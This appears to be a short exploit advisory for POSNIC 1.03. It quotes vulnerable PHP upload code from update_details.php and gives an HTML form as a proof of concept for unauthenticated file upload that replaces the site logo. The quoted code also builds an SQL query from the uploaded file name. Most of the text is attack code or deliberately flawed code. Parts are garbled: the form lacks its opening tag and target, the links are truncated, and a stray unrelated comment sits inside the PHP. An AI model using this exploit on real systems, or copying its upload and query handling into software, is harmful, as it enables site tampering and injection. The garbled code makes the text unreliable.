<!--
# Exploit Title: POSNIC Unauthenticated File Upload
# Date: 04-02-2017
# Exploit Author: Rony Das
# Vendor Homepage: http:
# Software Link: https:
# Version: 1.03
# Tested on: Ubuntu 14.04
-->
<!--
VULNERABLE CODE: /update_details.php
<if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') {
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 30000)
&& in_array($extension, $allowedExts)
) {
if ($_FILES["file"]["error"] > 0) {
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
} else {
$upload = $_FILES["file"]["name"];
$type = $_FILES["file"]["type"];
if (file_exists("upload/" . $_FILES["file"]["name"])) {
unlink($upload);
}
$name = $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $name);
$upload;
$_SESSION['logo'] = $upload;
# Note that filters and validators are separate rule sets and method calls. There is a good reason for this.
$db->query("UPDATE store_details SET log ='" . $upload . "',type='" . $type . "'");
-->
<!-- Exploit -->
<!--
Then choose a image file and rename it to "posnic.png" this replaces the LOGO ,
not overwrites because they delete's the file if already exists and replaces with the
new uploaded file.
-->
<center>
<p>Upload Logo</p>
<input type="file" name="file" id="file"><br><br><br>
<input type="submit" name="submit" value="Submit">
</form>
